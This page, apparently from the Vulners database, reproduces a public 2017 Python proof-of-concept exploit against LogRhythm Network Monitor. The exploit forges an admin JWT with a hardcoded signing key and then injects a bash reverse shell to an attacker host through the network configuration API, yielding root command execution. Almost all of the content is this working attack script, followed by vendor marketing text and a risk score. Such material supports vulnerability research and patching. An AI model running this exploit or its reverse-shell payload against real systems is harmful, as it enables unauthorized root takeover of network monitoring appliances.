Vulners
Lucene search
LogRhythm Network Monitor - Authentication Bypass / Command Injection
# Exploit Title: LogRhythm Network Monitor Auth Bypass Root RCE
# Public Disclosure Date: 24 Apr 2017
# Author: Francesco Oddo
# Reference: http://security-assessment.com/files/documents/advisory/Logrhythm-NetMonitor-Advisory.pdf
# Software Link: https://logrhythm.com/network-monitor-freemium/
# Version: 3.3.2.1061 (latest) or below
# Tested On: nm_install_3.3.2.1061.iso with Freemium License (SHA256 7978f84e9fb18e2fae95f77a263801ca89b4767c95154b9ea874032081b02ce1)
# Dependencies: `pip install PyJWT`
import json
import requests
import argparse
import time
import jwt
def forge_jwt(rhost):
print "[+] Forging JWT authentication token"
key = 'Gluten-free 100% narwhal deserunt polaroid; quinoa keytar asymmetrical slow-carb plaid occaecat nostrud green juice dolor!'
iat = time.time()
exp = iat + 3600;
body = json.loads('{"iat":1479893930,"exp":1479894830,"data":{"username":"admin","licensed":true,"role":"admin","timeToResetPass":false}}')
body["iat"] = int(iat)
body["exp"] = int(exp)
token = jwt.encode(body, key, algorithm='HS512');
return token
def command_inject(rhost, lhost, lport, gwhost, ifname):
uri = "https://%s/data/api/configuration/" % rhost
json_body = json.loads('{"type":"network","configurations":[{"name":"interface","value":"","isToggle":false},{"name":"method","value":true,"isToggle":true},{"name":"ipAddress","value":"","isToggle":false},{"name":"netMask","value":"255.255.255.0","isToggle":false},{"name":"gateway","value":"","isToggle":false},{"name":"dnsServers","value":"","isToggle":false},{"name":"searchDomains","value":"","isToggle":false}],"diffFields":["dnsServers"]}')
payload = ";bash -i >& /dev/tcp/%s/%s 0>&1" % (lhost, lport)
json_body["configurations"][0]["value"] = ifname
json_body["configurations"][2]["value"] = rhost
json_body["configurations"][3]["value"] = payload
json_body["configurations"][4]["value"] = gwhost
json_body["configurations"][5]["value"] = gwhost
jwt = forge_jwt(rhost)
auth_header = {'Token': jwt}
print "[+] Initiating reverse shell via command injection at %s:%s" % (lhost, lport)
requests.post(url=uri, json=json_body, headers=auth_header, verify=False)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='LogRhythm Network Monitor Root Remote Command Execution PoC')
parser.add_argument('--rhost', help='RHOST IP address')
parser.add_argument('--lhost', help='LHOST IP address')
parser.add_argument('--lport', help='LPORT')
parser.add_argument('--gwhost', help='Gateway IP address')
parser.add_argument('--ifname', help='Target Interface Identifier', default='enp0s3')
args = parser.parse_args()
command_inject(args.rhost, args.lhost, args.lport, args.gwhost, args.ifname)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Apr 2017 00:00Current
7.4High risk
Vulners AI Score7.4